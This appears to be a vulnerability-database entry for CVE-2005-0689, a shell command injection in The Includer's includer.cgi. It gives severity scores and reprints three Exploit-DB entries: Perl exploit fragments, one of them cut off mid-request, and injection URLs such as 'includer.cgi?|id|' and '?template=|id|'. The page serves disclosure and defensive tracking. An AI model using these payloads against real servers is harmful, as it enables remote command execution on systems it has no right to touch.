CVE-2005-0689
published 2005-03-07CVE-2005-0689: includer.cgi in The Includer allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the URL or (2) the template parameter.
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.91%
95.0th percentile
includer.cgi in The Includer allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the URL or (2) the template parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jimmy | the_includer | — | — |
| jimmy | the_includer | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
The Includer CGI 1.0 - Remote Command Execution (3)
exploitdb·2005-04-08
CVE-2005-0689 The Includer CGI 1.0 - Remote Command Execution (3)
The Includer CGI 1.0 - Remote Command Execution (3)
---
#!/usr/bin/perl
#
# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r]
#
# C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend!
#
# I think the bug was discovered by Francisco Alisson.
#
# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm.
#
# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b.
#
##########################################################################
# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1
# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]
# [?] Insert command: id
# [+] Conecting to 127.0.0.1
# [+] Connected to 127.0.0.1
# [+] Injecting command ...
# uid=500(kc) gid=500(kc) gruppi=500(kc)
# [kc@K-C0d3r xpl]$
###################################
Exploit-DB
The Includer CGI 1.0 - Remote Command Execution (2)
exploitdb·2005-04-08
CVE-2005-0689 The Includer CGI 1.0 - Remote Command Execution (2)
The Includer CGI 1.0 - Remote Command Execution (2)
---
#!/usr/bin/perl
############################################################
# Target - The Includer CGI \n\n";
print " - Host name of taget.\n";
print " - If not in dir type / symbol.\n";
print " - command for execution.\n\n";
print " Examples:\n\n";
print " incl_10.pl 127.0.0.1 /cgi-bin/ \"ls -la\"\n";
print " incl_10.pl 127.0.0.1 / \"uname -a\"\n";
print " incl_10.pl www.test.com / \"ps auxw\"\n";
exit();
}
$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;
$dir = $ARGV[1];
$cmd = $cmde = $ARGV[2];
print "\n ===[ Info for query ]========================\n";
print " = Target: $serv\n";
print " = Dir: $dir\n";
print " = Cmd: $cmd\n";
print " =============================================\n\n";
$cmde =~ s/ /"\$IFS"/ge;
$req = "GET ht
Exploit-DB
The Includer CGI 1.0 - Remote Command Execution (1)
exploitdb·2005-03-07
CVE-2005-0689 The Includer CGI 1.0 - Remote Command Execution (1)
The Includer CGI 1.0 - Remote Command Execution (1)
---
Remote Command Execution on:
Example I.: www.host-vulnerable.com/includer.cgi?|id|
Example II.: www.host-vulnerable.com/includer.cgi?template=|id|
# milw0rm.com [2005-03-07]
No writeups or analysis indexed.
2005-03-07
Published